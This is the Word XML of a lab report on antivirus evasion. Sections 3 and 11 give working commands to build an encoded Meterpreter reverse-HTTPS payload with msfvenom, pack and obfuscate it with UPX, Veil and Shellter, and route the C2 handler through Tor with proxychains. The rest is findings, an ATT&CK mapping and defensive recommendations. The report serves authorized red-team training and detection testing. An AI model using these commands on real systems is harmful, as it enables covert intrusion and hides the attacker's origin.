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2F629" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Task 4 — Advanced Evasion Lab (Full Report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDA5278" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Author: MALEPATI SAMSKAR REDDY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9A9BB0" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Date: September 19, 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C537D77" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Attacker: Kali Linux — 192.168.17.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A00FF7E" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Target: Windows VM — 192.168.17.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235666A2" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AC10DF" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18100172" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Test and validate advanced evasion techniques: generate and obfuscate payloads to bypass signature-based defenses, and route C2 traffic through anonymizing networks to assess detection and egress controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3914425D" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Lab Environment &amp; Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5942BC5B" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7040CF57" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Attacker host: Kali Linux (isolated lab)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015F261C" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Target host: Windows VM (with EDR/AV installed for testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A45AA0F" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D99C989" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- msfvenom (Metasploit payload generator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD541AC" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Veil-Evasion / Shellter (payload obfuscation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2345201A" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- proxychains + Tor (anonymized routing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DED5D43" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- UPX / custom packers (binary packing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061FA8B0" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Network tools: Burp, tcpdump, Wireshark for traffic analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07971725" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Step-by-Step Methodology (with reconstructed commands)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5FAA8D" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The following are reconstructed commands and workflows commonly used in the lab for payload obfuscation and egress routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531EC155" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>A. Generate a payload with msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEBB91C" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37296234" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t># Generate a reverse_https Meterpreter payload and encode</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.17.128 LPORT=443 -f exe -o payload.exe -e x86/shikata_ga_nai -i 3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A94878" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>B. Obfuscate/pack the binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4E0CCA" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134DA27D" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t># Pack with UPX</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>upx --best payload.exe -o payload_packed.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># Use Veil or Shellter to wrap and obfuscate</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>veil-evasion -p windows/meterpreter -o veil_payload.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># Or use Shellter (dynamic PE mutation)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>shellter -a -b -f payload.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F47B0" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>C. Test payload against AV and EDR in lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764E0034" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296ABFDB" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t># Hash the file and scan with local AV</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>sha256sum payload_packed.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># Upload to lab AV or run local scans; observe detection labels and adjust encoders/iterations</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4EFCDC" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>D. Route C2 through Tor using proxychains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14478EFE" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Example proxychains configuration and execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18455E8C" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t># Ensure Tor is running (tor service start)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>proxychains msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_https; set LHOST 127.0.0.1; set LPORT 4444; run"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># Or run payload to connect out via proxychains</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>proxychains ./payload_packed.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FA0954" w14:textId="28AA6D98" w:rsidR="00635212" w:rsidRDefault="00000000" w:rsidP="005261FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. Observed Evidence </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1844AC11" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Screenshot From 2025-09-17 21-19-42.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D89C5C5" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Screenshot From 2025-09-17 21-23-12.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4974D5E1" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Screenshot From 2025-09-17 21-29-05.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223E053D" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Screenshot From 2025-09-17 21-30-06.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405BA93C" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Screenshot From 2025-09-17 22-01-07.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177845DB" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. Test Results &amp; Timeline (reconstructed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1C9AFA" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:br/>
        <w:t>- T0: Generated initial Meterpreter reverse_https payload with msfvenom and baseline encoder iterations.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- T1: Applied binary packing/obfuscation (UPX / Veil) and re-tested against lab AV; detection reduced in iterative tests.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- T2: Established msf multi/handler locally and validated callback in isolated lab.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- T3: Routed handler/exfil via Tor using proxychains to simulate anonymized egress; beaconing observable but attribution more difficult.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- T4: Documented AV labels, network destination patterns, and times for the final report.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70726067" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6. Findings &amp; Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE94BB9" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Payload obfuscation and packing can significantly reduce signature-based AV detections in lab conditions; behavioral EDR is still effective when configured properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070ADF3D" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Routing C2 through Tor hides origin and complicates standard network attribution; egress filtering and Tor-blocking are effective mitigations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4722D158" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Risk Rating: Medium-High — successful evasion in lab does not guarantee success in production but exposes detection gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC600ED" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501E4369" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- T1027 — Obfuscated Files or Information (payload encoding/packing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340CFFA4" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- T1071 — Application Layer Protocol (beaconing over HTTPS via anonymized route)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B81104" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- T1566.002 — Spearphishing Attachment (if payload delivered as attachment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D71A982" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8. Recommendations (technical &amp; operational)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C80BF29" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Technical controls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0232670F" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Use behavioral EDR that monitors process behavior, parent-child chains, reflective loading, and in-memory execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A851C9" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- Implement strict egress filtering and block known Tor exit nodes where appropriate for your environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5673B8" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Monitor for unusual TLS fingerprints, certificate anomalies, and periodic beacon patterns; implement TLS inspection for suspected hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A259AD" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Leverage sandbox detonation with behavior analysis rather than only signature scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4056F0D4" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Operational controls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6261CA95" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Regularly test AV/EDR efficacy with red-team obfuscation techniques and adjust detection rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA5A09A" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Maintain incident response playbooks for suspected anonymized C2 traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590F120E" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Train SOC analysts to correlate endpoint behavior with network telemetry and threat intelligence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32348252" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9. Forensic Artifacts to Collect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23785876" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Binary samples (original and obfuscated) with hashes and sample metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE66415" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- AV/EDR detection logs and telemetry during payload execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539A62D4" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Network captures (PCAP) showing Tor/Proxychains traffic and C2 attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CE39C0" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Memory captures to detect in-memory injectors or reflective loaders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568A79AD" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10. 50-Word Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196AD684" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Generated obfuscated Meterpreter payloads with msfvenom and Veil, packed with UPX, and routed C2 traffic via Tor using proxychains. In lab conditions obfuscation reduced signature detection; behavioral EDR and egress controls remain effective mitigations. Recommend regular obfuscation testing and egress monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B43250" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11. Appendix: Reconstructed Commands &amp; Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FAEEEB" w14:textId="77777777" w:rsidR="00635212" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t># msfvenom obfuscation example</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.17.128 LPORT=443 -f exe -o payload.exe -e x86/shikata_ga_nai -i 3</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>upx --best payload.exe -o payload_packed.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># Veil / Shellter usage</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>veil-evasion -p windows/meterpreter -o veil_payload.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>shellter -a -b -f payload.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># Tor / proxychains routing</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>service tor start</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>proxychains msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_https; set LHOST 127.0.0.1; set LPORT 4444; run"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006352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385077">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1497383926">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1643005043">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="378360697">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1371372765">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1532912759">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1260524860">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="567695916">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="15514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36D"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="005261FB"/>
    <w:rsid w:val="0063521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13BB"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{20667174-E70C-428A-9601-7FCA8054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samskar Malepati</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-19T10:32:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>